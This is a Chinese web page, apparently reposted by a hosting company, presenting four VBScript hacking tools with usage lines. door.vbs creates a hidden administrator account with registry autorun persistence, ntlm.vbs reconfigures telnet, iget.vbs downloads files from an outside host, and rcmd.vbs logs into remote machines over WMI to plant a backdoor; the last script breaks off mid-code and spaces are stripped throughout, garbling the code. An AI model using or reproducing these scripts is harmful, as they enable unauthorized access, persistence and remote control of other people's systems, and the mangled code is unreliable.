快速业务通道

黑客必须要知道的几个vbs文件代码

作者 佚名 来源 ASP编程 浏览 发布时间 2013-07-09

1.door.vbs
''***************
''door.vbsby黑嘿黑
''***************
dimwsh,FA,FSO
setfso=CreateObject("Scripting.FileSystemObject")
SetFA=FSO.GetFile(WScript.scriptFullName)
FA.Attributes=34
setwsh=CreateObject("WScript.Shell")
wsh.run"netuserIUSE_SERVERxyhack.91i.net/add",0,true
wsh.run"netlocalgroupadministratorsIUSE_SERVER/add",0,true
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""
wsh.Regwrite


"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\AutoRun",""&FA&""
wsh.regwrite"HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\AutoRun",""&FA&""

功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。
使用:直接运行。

2.ntlm.vbs
''***************
''ntlm.vbsby黑嘿黑
''***************
dimwsh
setwsh=CreateObject("WScript.Shell")
wsh.regwrite"HKLM\Software\Microsoft\TelnetServer\1.0\NTLM",WScript.Arguments(0),"REG_DWORD"
wsh.regwrite"HKLM\Software\Microsoft\TelnetServer\1.0\TelnetPort",WScript.Arguments(1),"REG_DWORD"

功能:自定义telnet的ntml和端口。
使用:D:\>ntml.vbs1999

3.iget.vbs
''***************************
''iget.vbsModby黑嘿黑
''***************************
SetxPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open"GET",LCase(WScript.Arguments(0)),0
xPost.Send()
SetsGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFileLCase(WScript.Arguments(1)),2

功能:命令行下下载http文件。
使用:D:\>iget.vbshttp://xyhack.91i.net/vbs.rarvbs.rar

4.rcmd.vbs
''***************
''rcmd.vbsby黑嘿黑
''***************
onerrorresumenext
setoutstreem=wscript.stdout
setinstreem=wscript.stdin
if(lcase(right(wscript.fullname,11))="wscript.exe")then
setobjShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))
endif
ifwscript.arguments.count<3then
usage()
wscript.echo"Notenoughparameters."
wscript.quit
endif

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)

usage()
outstreem.write"Conneting"&ipaddress&"...."
setobjlocator=createobject("wbemscripting.swbemlocator")''20
setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
objswbemservices.security_.privileges.add23,true
objswbemservices.security_.privileges.add18,true
objswbemservices.security_.privileges.add7,true
objswbemservices.security_.privileges.add11,true
iferrornumber<>0then
wscript.echo"Error!"
callmain()
else
wscript.echo"OK!"
endif
callmain()

''***********************************************************
functiondoor()
outstreem.write"Creatingtheblankdoor.."
setobjinstproc=objswbemservices.get("win32_process")
cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%\system32\svrer.vbs"_
&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%\system32\svrer.vbs"_
&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%\syst

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号